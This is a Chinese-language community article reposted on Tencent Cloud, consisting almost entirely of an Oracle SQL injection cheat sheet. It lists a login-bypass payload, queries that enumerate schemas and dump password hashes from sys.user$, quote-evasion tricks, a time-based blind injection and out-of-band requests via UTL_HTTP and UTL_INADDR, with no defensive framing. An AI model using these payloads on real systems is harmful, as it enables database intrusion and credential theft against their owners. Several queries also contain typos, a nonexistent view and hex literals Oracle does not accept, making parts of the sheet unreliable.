前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >数据库的一些注入技巧-Oracle

数据库的一些注入技巧-Oracle

作者头像
Jumbo
发布2019-11-14 17:31:21
7660
发布2019-11-14 17:31:21
举报
文章被收录于专栏:中国白客联盟

默认数据库

SYSTEM

SYSAUX

注释

--

SELECT * FROM Users WHERE username = '' OR1=1 --' AND password = '';

查询版本信息

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

SELECT banner FROM v$version WHERE banner LIKE 'TNS%';

SELECT version FROM v$instance;

数据库凭证

SELECT username FROM all_users;

支持所有版本

SELECT name, password from sys.user$;

高权限, <= 10g

SELECT name, spare4 from sys.user$;

高权限, <= 11g

查询数据库信息

查询当前库

SELECT name FROM v$database;

SELECT instance_name FROM v$instance

SELECT global_name FROM global_name

SELECT SYS.DATABASE_NAME FROM DUAL

用户数据库

SELECT DISTINCT owner FROM all_tables;

主机名称

SELECT host_name FROM v$instance; (Privileged)

SELECT UTL_INADDR.get_host_name FROM dual;

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;

SELECT UTL_INADDR.get_host_address FROM dual;

查询表和列

查询表

SELECT table_name FROM all_tables;

查询列

SELECT column_name FROMall_tab_columns;

从列中查询表

SELECT column_name FROM all_tab_columns WHEREtable_name = 'Users';

从表中查询列

SELECT table_name FROMall_tab_tables WHERE column_name = 'password';

查询多个表信息

SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;

避免使用引号

SELECT 0x09120911091 FROM dual;

Hex编码

SELECT CHR(32)||CHR(92)||CHR(93) FROM dual;

CHR() 函数

字符串拼接

SELECT 'a'||'d'||'mi'||'n' FROM dual;

条件语句

SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual

时间注入

SELECTUTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

AND (SELECT COUNT(*) FROM all_users t1, all_userst2, all_users t3, all_users t4, all_users t5) > 0 AND 300 >ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

查询权限

SELECT privilege FROM session_privs;

SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

DNS带外

SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;

SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

全文pdf下载地址:

https://www.chinabaiker.com/sql.pdf

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-11-09,如有侵权请联系 cloudcommunity@tencent.com 删除
面向对象编程
数据库
sql

本文分享自 中国白客联盟 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

面向对象编程
数据库
sql
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 默认数据库
  • 注释
  • 查询版本信息
  • 数据库凭证
  • 查询数据库信息
    • 查询当前库
      • 用户数据库
        • 主机名称
        • 查询表和列
          • 查询表
            • 查询列
              • 从列中查询表
                • 从表中查询列
                  • 查询多个表信息
                  • 避免使用引号
                  • 字符串拼接
                  • 条件语句
                  • 时间注入
                  • 查询权限
                  • DNS带外
                  相关产品与服务
                  数据库
                  云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
                  产品介绍
                  11.11 上云拼团GO
                  领券

                  腾讯云开发者

                  扫码关注腾讯云开发者

                  扫码关注腾讯云开发者

                  领取腾讯云代金券

                  热门产品

                  热门推荐

                  更多推荐

                  Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

                  深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

                  腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

                  问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

                  Copyright © 2013 - 2024 Tencent Cloud.

                  All Rights Reserved. 腾讯云 版权所有

                  登录 后参与评论